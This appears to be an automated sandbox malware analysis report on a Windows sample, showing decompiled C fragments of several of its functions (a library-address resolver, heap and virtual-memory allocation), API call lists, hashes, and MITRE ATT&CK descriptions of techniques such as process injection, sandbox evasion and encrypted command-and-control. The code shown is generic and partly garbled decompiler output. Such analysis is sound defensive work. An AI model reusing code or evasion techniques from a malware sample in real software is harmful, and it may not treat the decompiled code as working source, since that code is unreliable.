Opcode Fuzzy Hash: 46aac531217d429e880bb880db5e2a59e10f4db92b5c2f864625b5ee7c2b489c
Instruction Fuzzy Hash: 6AF05475940302ABE300DF50DD89B5A7794AB54744F84893DBA48A22E0F7FCD544865A

Uniqueness

Uniqueness Score: -1.00%

Function 00406CB3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00406CB3() {
				int _t12;
				int _t13;
				void* _t20;

				 *(_t20 - 4) =  *(_t20 - 4) | 0xffffffff;
				if(0 == 0) {
					L4:
					_t12 = 0;
				} else {
					_t13 = MultiByteToWideChar( *(_t20 + 0x18), 1,  *(_t20 + 0xc),  *(_t20 + 0x10), 0,  *(_t20 - 0x20));
					if(_t13 == 0) {
						goto L4;
					} else {
						_t8 = _t20 + 0x14; // 0x406d59
						_t12 = GetStringTypeW( *(_t20 + 8), 0, _t13,  *_t8);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t20 - 0x10));
				return _t12;
			}

0x00406cba
0x00406cc0
0x00406ceb
0x00406ceb
0x00406cc2
0x00406cd1
0x00406cd9
0x00000000
0x00406cdb
0x00406cdb
0x00406ce3
0x00406ce3
0x00406cd9
0x00406cf3
0x00406cfe

APIs

MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00406D59,?), ref: 00406CD1
GetStringTypeW.KERNEL32(?,?,00000000,Ym@,?,?,?,?,?,?,00406D59,?), ref: 00406CE3

Strings

Ym@, xrefs: 00406CDB

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiStringTypeWide
String ID: Ym@
API String ID: 3139900361-983799895
Opcode ID: 3cd6e0a5aaf87e07ac5ee2da931a4589a6c4811af2752385156a542494a200fd
Instruction ID: 4864dbb2f1dc6851fa6d39f1cf95cb1d28185d978e6c1f9092e5c79113f981ec
Opcode Fuzzy Hash: 3cd6e0a5aaf87e07ac5ee2da931a4589a6c4811af2752385156a542494a200fd
Instruction Fuzzy Hash: AEF05832905119AFCF218F80DE45AEEBF36FF04360F024539FA62761A0C3368920DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401000(CHAR* _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _t4;
				CHAR* _t8;

				_t4 =  *0x40cf4c; // 0x74af0000
				 *_t8 = 0x4e52454b;
				_v8 = 0x32334c45;
				_v4 = 0;
				if(_t4 == 0) {
					_t4 = LoadLibraryA(_t8);
					 *0x40cf4c = _t4;
				}
				return GetProcAddress(_t4, _a4);
			}

0x00401003
0x00401008
0x00401012
0x0040101a
0x00401022
0x00401029
0x0040102f
0x0040102f
0x00401043

APIs

LoadLibraryA.KERNEL32(74AF0000,?,?,?,?,?,?,?,?,?,00401F7B), ref: 00401029
GetProcAddress.KERNEL32(74AF0000,?), ref: 0040103A

Strings

EL32, xrefs: 00401012

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: EL32
API String ID: 2574300362-3367122695
Opcode ID: 2ae5c11028faa6d09cc1856fc149f88123bfbf338145613ffade19823f03ab3e
Instruction ID: e57299af7337993e7b686878eb83ed0512805ea50c4953b9a9f89a59caef0946
Opcode Fuzzy Hash: 2ae5c11028faa6d09cc1856fc149f88123bfbf338145613ffade19823f03ab3e
Instruction Fuzzy Hash: 39E0B6B4505341AFC740DF68EB4871A7BE8BB84304F40897DEA89D7250DB34D5488F1B

Uniqueness

Uniqueness Score: -1.00%

Function 00404741, Relevance: 5.1, APIs: 4, Instructions: 53
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404741() {
				signed int _t15;
				void* _t17;
				void* _t19;
				void* _t25;
				signed int _t26;
				void* _t27;
				intOrPtr* _t29;

				_t15 =  *0x40d518; // 0x0
				_t26 =  *0x40d508; // 0x0
				if(_t15 != _t26) {
					L3:
					_t27 =  *0x40d51c; // 0x0
					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x40d524, 8, 0x41c4);
					 *(_t29 + 0x10) = _t17;
					if(_t17 == 0) {
						L6:
						return 0;
					}
					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4);
					 *(_t29 + 0xc) = _t19;
					if(_t19 != 0) {
						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
						 *_t29 = 0;
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *0x40d518 =  *0x40d518 + 1;
						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
						return _t29;
					}
					HeapFree( *0x40d524, 0,  *(_t29 + 0x10));
					goto L6;
				}
				_t2 = _t26 * 4; // 0x50
				_t25 = HeapReAlloc( *0x40d524, 0,  *0x40d51c, _t26 + _t2 + 0x50 << 2);
				if(_t25 == 0) {
					goto L6;
				}
				 *0x40d508 =  *0x40d508 + 0x10;
				 *0x40d51c = _t25;
				_t15 =  *0x40d518; // 0x0
				goto L3;
			}

0x00404741
0x00404746
0x00404752
0x00404784
0x00404784
0x0040479a
0x0040479d
0x004047a5
0x004047a8
0x004047d4
0x00000000
0x004047d4
0x004047b7
0x004047bf
0x004047c2
0x004047d8
0x004047dc
0x004047de
0x004047e1
0x004047ea
0x00000000
0x004047ed
0x004047ce
0x00000000
0x004047ce
0x00404754
0x00404769
0x00404771
0x00000000
0x00000000
0x00404773
0x0040477a
0x0040477f
0x00000000

APIs

HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,00404509,00000000,00000000,00000000,0040292C,00000000,00000000,?,00000000,00000000,00000000), ref: 00404769
HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00404509,00000000,00000000,00000000,0040292C,00000000,00000000,?,00000000,00000000,00000000), ref: 0040479D
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 004047B7
HeapFree.KERNEL32(00000000,?), ref: 004047CE

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: ff238c7abc86e0ade8ea29734b33f15928545eb4314a05c50a12ed12f92fa091
Instruction ID: a55063c2d52c13fd6a85e6346748cc6d7dbe4ad701c08372f3dbf3961b163e33
Opcode Fuzzy Hash: ff238c7abc86e0ade8ea29734b33f15928545eb4314a05c50a12ed12f92fa091
Instruction Fuzzy Hash: E1118F70A00200BFC7309F59EE45D227BB5FB9A728711493EEA51E75B0C771995ACF18

Uniqueness

Uniqueness Score: -1.00%

Function 004052B0, Relevance: 5.0, APIs: 4, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004052B0(void* __eax) {
				void* _t1;

				_t1 = __eax;
				InitializeCriticalSection( *0x40c2b4);
				InitializeCriticalSection( *0x40c2a4);
				InitializeCriticalSection( *0x40c294);
				InitializeCriticalSection( *0x40c274);
				return _t1;
			}

0x004052b0
0x004052bd
0x004052c5
0x004052cd
0x004052d5
0x004052d8

APIs

InitializeCriticalSection.KERNEL32(?,00403252,?,004026EE), ref: 004052BD
InitializeCriticalSection.KERNEL32(?,00403252,?,004026EE), ref: 004052C5
InitializeCriticalSection.KERNEL32(?,00403252,?,004026EE), ref: 004052CD
InitializeCriticalSection.KERNEL32(?,00403252,?,004026EE), ref: 004052D5

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: 51868eb20ad439a3be905c2bcae9f0149217b81578f7f253b405c5c77d8d41f1
Instruction ID: c45305cb3e823c81d6ea6f37651147a6e0c3b892bf36741c7ff915a60156b057
Opcode Fuzzy Hash: 51868eb20ad439a3be905c2bcae9f0149217b81578f7f253b405c5c77d8d41f1
Instruction Fuzzy Hash: AFC00231C01035DBCE123BA5FF858463F26EB0526070502BBA108718308A711C11DFC8

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 3fVvJyTvQU

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Function 004018A0, Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 51
libraryloaderCOMMON

Function 0040267E, Relevance: 3.1, APIs: 2, Instructions: 68
COMMON

Function 004053B0, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 00401ED0, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 32
libraryloaderCOMMON

Function 00403AA1, Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Function 00403420, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51
COMMON

Function 00403DD2, Relevance: 3.0, APIs: 2, Instructions: 30
memoryCOMMON

Function 004028DE, Relevance: 1.6, APIs: 1, Instructions: 80
memoryCOMMON

Function 00401050, Relevance: 82.7, APIs: 22, Strings: 25, Instructions: 457
memorystringcomCOMMON

Function 004048ED, Relevance: .3, Instructions: 259
COMMONCrypto

Function 00401FD0, Relevance: 73.6, APIs: 3, Strings: 39, Instructions: 97
stringCOMMON

Function 00401980, Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325
libraryfilestringCOMMON

Function 00406967, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177
COMMON

Function 004065BF, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMON

Function 00406BB6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117
COMMON

Function 00403F49, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100
fileCOMMON

Function 0040396F, Relevance: 12.1, APIs: 8, Instructions: 132
COMMON

Function 00403C8A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115
COMMON

Function 004076E0, Relevance: 7.5, APIs: 5, Instructions: 45
memorystringCOMMON

Function 004032B3, Relevance: 7.5, APIs: 5, Instructions: 38
threadCOMMON

Function 00406A7B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51
COMMON

Function 00407304, Relevance: 6.5, APIs: 5, Instructions: 278
COMMON

Function 00404BE3, Relevance: 6.4, APIs: 5, Instructions: 102
memoryCOMMON

Function 00405CFE, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Function 00401F50, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30
libraryCOMMON

Function 00406CB3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29
COMMON

Function 00401000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
libraryloaderCOMMON

Function 00404741, Relevance: 5.1, APIs: 4, Instructions: 53
memoryCOMMON

Function 004052B0, Relevance: 5.0, APIs: 4, Instructions: 12
COMMON